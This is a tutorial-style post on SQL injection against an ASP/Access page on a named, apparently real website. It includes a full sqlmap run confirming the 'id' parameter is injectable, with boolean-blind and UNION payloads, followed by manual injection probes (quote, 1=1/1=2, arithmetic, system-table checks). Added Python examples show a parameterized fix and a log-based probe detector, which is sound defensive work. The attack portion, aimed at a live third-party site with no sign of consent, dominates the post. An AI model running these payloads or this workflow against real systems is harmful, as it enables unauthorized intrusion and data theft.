1. How SQL injection vulnerabilities arise.
During development, SQL statements are not written to a consistent standard and special characters in user input are not filtered, so a client can submit fragments of SQL through the global variables POST and GET and have them executed as part of the query.
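To make the cause concrete, here is an added Python example (not code from the original post, whose target is a classic ASP page on Access) that uses an in-memory SQLite table constructed to stand in for the record table behind cyjb_xx.asp: the vulnerable lookup pastes the id parameter into the SQL text, while the hardened lookup validates the value and binds it as a parameter.

```python
import re
import sqlite3

# Constructed stand-in for the Access table behind cyjb_xx.asp (hypothetical schema and rows)
_db = sqlite3.connect(":memory:")
_db.executescript("""
CREATE TABLE cyjb (id INTEGER PRIMARY KEY, title TEXT);
INSERT INTO cyjb VALUES (13, 'record thirteen'), (14, 'record fourteen');
""")


def lookup_vulnerable(id_param: str):
    """The flaw described above: the raw GET value is concatenated into the SQL text."""
    sql = "SELECT title FROM cyjb WHERE id=" + id_param
    try:
        row = _db.execute(sql).fetchone()
    except sqlite3.OperationalError as exc:
        # A stray quote breaks the statement: the JET '80040e14' syntax-error case
        return ("error", str(exc))
    # A false condition such as "and 1=2" yields no row: the 'record not found' / EOF case
    return ("ok", row[0]) if row else ("empty", None)


def lookup_safe(id_param: str):
    """Hardened form: check the expected type, then bind the value instead of concatenating."""
    if not re.fullmatch(r"[0-9]+", id_param):
        # 14', 14-1 and 14 and 1=1 never reach the database
        return ("rejected", None)
    row = _db.execute("SELECT title FROM cyjb WHERE id=?", (int(id_param),)).fetchone()
    return ("ok", row[0]) if row else ("empty", None)
```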

root@instance-ce9256h8:~# sqlmap -u http://www.kfzhongzhou.com/cyjb_xx.asp?id=14
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.2.6#stable}
|_ -| . [,]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 09:05:31

[09:05:32] [INFO] testing connection to the target URL
[09:05:32] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[09:05:32] [INFO] testing if the target URL content is stable
[09:05:33] [INFO] target URL content is stable
[09:05:33] [INFO] testing if GET parameter 'id' is dynamic
[09:05:33] [INFO] confirming that GET parameter 'id' is dynamic
[09:05:33] [INFO] GET parameter 'id' is dynamic
[09:05:33] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'Microsoft Access')
[09:05:33] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'Microsoft Access'. Do you want to skip test payloads specific for other DBMSes? [Y/n] n
for the remaining tests, do you want to include all tests for 'Microsoft Access' extending provided level (1) and risk (1) values? [Y/n] n
[09:08:26] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:08:26] [WARNING] reflective value(s) found and filtering out
[09:08:27] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="65858052")
[09:08:27] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:08:27] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[09:08:27] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[09:08:27] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[09:08:27] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[09:08:27] [INFO] testing 'MySQL inline queries'
[09:08:27] [INFO] testing 'PostgreSQL inline queries'
[09:08:27] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[09:08:27] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[09:08:27] [WARNING] time-based comparison requires larger statistical model, please wait............. (done)
[09:08:29] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[09:08:29] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[09:08:29] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[09:08:29] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[09:08:29] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[09:08:30] [INFO] testing 'Oracle AND time-based blind'
[09:08:30] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[09:08:30] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[09:08:30] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[09:08:30] [INFO] target URL appears to have 6 columns in query
[09:08:39] [INFO] target URL appears to be UNION injectable with 6 columns
[09:08:41] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 89 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=14 AND 8567=8567

Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: id=-6399 UNION ALL SELECT NULL,CHR(113)&CHR(122)&CHR(122)&CHR(122)&CHR(113)&CHR(119)&CHR(100)&CHR(73)&CHR(84)&CHR(66)&CHR(104)&CHR(105)&CHR(113)&CHR(69)&CHR(113)&CHR(106)&CHR(101)&CHR(79)&CHR(78)&CHR(76)&CHR(79)&CHR(80)&CHR(122)&CHR(80)&CHR(116)&CHR(97)&CHR(120)&CHR(70)&CHR(116)&CHR(108)&CHR(68)&CHR(119)&CHR(110)&CHR(66)&CHR(107)&CHR(85)&CHR(108)&CHR(115)&CHR(97)&CHR(101)&CHR(86)&CHR(113)&CHR(77)&CHR(84)&CHR(81)&CHR(113)&CHR(98)&CHR(118)&CHR(112)&CHR(113),NULL,NULL,NULL,NULL FROM MSysAccessObjects%16
---
[09:09:23] [INFO] testing Microsoft Access
[09:09:23] [INFO] confirming Microsoft Access
[09:09:23] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[09:09:23] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 42 times
[09:09:23] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.kfzhongzhou.com'

[*] shutting down at 09:09:23
From the output above we learn that the site uses an Access database, the web server is IIS 6.0 (Internet Information Services), the scripting language is ASP, and the operating system is Windows Server 2003 or Windows XP.
Manual injection on Access:
(1) Determining whether SQL injection exists
Rough test: append a single quote, e.g. http://www.kfzhongzhou.com/cyjb_xx.asp?id=14'. If the response is
Microsoft JET Database Engine 错误 '80040e14'
字符串的语法错误 在查询表达式 'id=14'' 中
(the localized JET "syntax error in string in query expression" message), SQL injection exists.
Logical tests:
Numeric injection: and 1=1 / and 1=2
String injection: 'and'1'='1 / 'and'1'='2
Search injection: %' and 1=1 and '%'='% / %' and 1=2 and '%'='%
(i) The quote method
http://www.kfzhongzhou.com/cyjb_xx.asp?id=14'
Output:

Microsoft JET Database Engine 错误 '80040e14'
字符串的语法错误 在查询表达式 'id=14'' 中。
/cyjb_xx.asp,行 69
If the output looks like the above, the site has SQL injection.
(ii) Appending -1 to the id parameter
http://www.kfzhongzhou.com/cyjb_xx.asp?id=14-1
Many sites filter the single quote. In that case we can append "-1" to the id parameter; a different but normally rendered page comes back, because the expression 14-1 is evaluated inside the query, so the result differs from http://www.kfzhongzhou.com/cyjb_xx.asp?id=14 while the page itself still renders without error.
(iii) Using 1=1 and 1=2 to test for injection
The quote method is direct and simple, but programmers who know something about SQL injection filter the single quote when writing their code, so a quote test then finds no injection point. In that case the classic "1=1 and 1=2" method can be used.
If the normal page URL is http://www.kfzhongzhou.com/cyjb_xx.asp?id=14, enter the following two URLs in the browser and compare what each returns.
http://www.kfzhongzhou.com/cyjb_xx.asp?id=14 and 1=1
http://www.kfzhongzhou.com/cyjb_xx.asp?id=14 and 1=2
If an injection point exists, the browser shows:
and 1=1: content essentially identical to the normal page.
and 1=2: a BOF or EOF error (when the program does no checking), a "record not found" message, or an empty page (when the program added on error resume next).
The principle is to see whether the input was executed by the database: and 1=1 is always true, so the page returns normally; and 1=2 is always false, so the result is an error. The difference between the two results tells whether SQL injection exists.
(2) Determining the database type

and exists (select * from msysobjects) >0
and exists (select * from sysobjects) >0
Normally the system table of Microsoft Access is msysobjects, which users cannot read by default, whereas the system table of Microsoft SQL Server is sysobjects, which users can read by default.
If the database is Microsoft SQL Server and the parameter is not filtered, then the page shown after running the first statement is normal and the result of the second statement is abnormal; if the database is Microsoft Access, both links return abnormal pages.
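From the defender's side, the probes described in (1) and (2), and the burst of HTTP 500 responses reported at the end of the sqlmap run above, are all visible in the web server log. The following is an added Python example, not part of the original post, that runs over constructed IIS-style log lines (hypothetical traffic, not real requests) and flags clients that send those probe patterns or trigger repeated 5xx responses.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed W3C-style log lines: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status.
# They model the quote, boolean, and system-table probes described in the text; not real traffic.
SAMPLE_LOG = """\
2018-06-20 09:05:32 203.0.113.9 GET /cyjb_xx.asp id=14 200
2018-06-20 09:05:33 203.0.113.9 GET /cyjb_xx.asp id=14' 500
2018-06-20 09:05:34 203.0.113.9 GET /cyjb_xx.asp id=14+and+1%3D1 200
2018-06-20 09:05:35 203.0.113.9 GET /cyjb_xx.asp id=14+and+1%3D2 200
2018-06-20 09:05:36 203.0.113.9 GET /cyjb_xx.asp id=14+and+exists+(select+*+from+msysobjects)+%3E0 500
2018-06-20 09:06:01 198.51.100.4 GET /cyjb_xx.asp id=15 200
"""

# One pattern per test from the text: stray quote, 1=1/1=2 pair, id arithmetic, system-table probe
PROBES = {
    "quote": re.compile(r"'"),
    "boolean": re.compile(r"\band\s+1\s*=\s*[12]\b", re.I),
    "arithmetic": re.compile(r"=\s*\d+\s*-\s*\d+"),
    "systable": re.compile(r"\b(msysobjects|sysobjects|MSysAccessObjects)\b", re.I),
}


def classify_query(query: str):
    """Return the names of the probe patterns found in one URL-decoded query string."""
    decoded = unquote_plus(query)
    return [name for name, rx in PROBES.items() if rx.search(decoded)]


def scan_log(text: str, error_threshold: int = 2):
    """Aggregate per client IP; keep clients that sent a probe or hit the 5xx threshold."""
    stats = defaultdict(lambda: {"probes": set(), "errors": 0, "requests": 0})
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 7:
            continue  # skip headers, comments and malformed lines
        _date, _time, client, _method, _stem, query, status = parts
        entry = stats[client]
        entry["requests"] += 1
        entry["probes"].update(classify_query(query))
        if status.startswith("5"):
            entry["errors"] += 1
    return {c: s for c, s in stats.items() if s["probes"] or s["errors"] >= error_threshold}
```

A bare quote also appears in legitimate input, so in production the quote pattern is best weighted together with the 5xx count rather than alerted on alone.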
